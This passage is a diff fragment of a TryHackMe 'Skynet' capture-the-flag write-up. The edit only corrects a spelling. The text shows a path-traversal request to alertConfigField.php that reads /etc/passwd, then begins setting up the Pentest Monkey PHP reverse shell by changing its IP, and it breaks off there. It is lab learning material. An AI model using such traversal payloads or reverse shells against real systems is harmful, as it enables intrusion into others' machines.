Gomez0015/CTF-Writeups/📄 CTF Writeups/{THM} Skynet Writeup.md

 ################################################################################################################
 ```

 So if we follow the instructions and go to: `/alerts/alertConfigField.php` we can see that it works so lets try reading sensitive data.
-So using `alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd` we can read the /etc/passwd file but nothing intresting is found so lets try a reverse shelll using pentest monkey, after getting the reverse shell from [Pentest Monkey](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) we can touch a revShell.php file and all we need to change is
+So using `alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd` we can read the /etc/passwd file but nothing interesting is found so lets try a reverse shelll using pentest monkey, after getting the reverse shell from [Pentest Monkey](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) we can touch a revShell.php file and all we need to change is

 ```
 $ip = '127.0.0.1';  // CHANGE THIS TO YOUR IP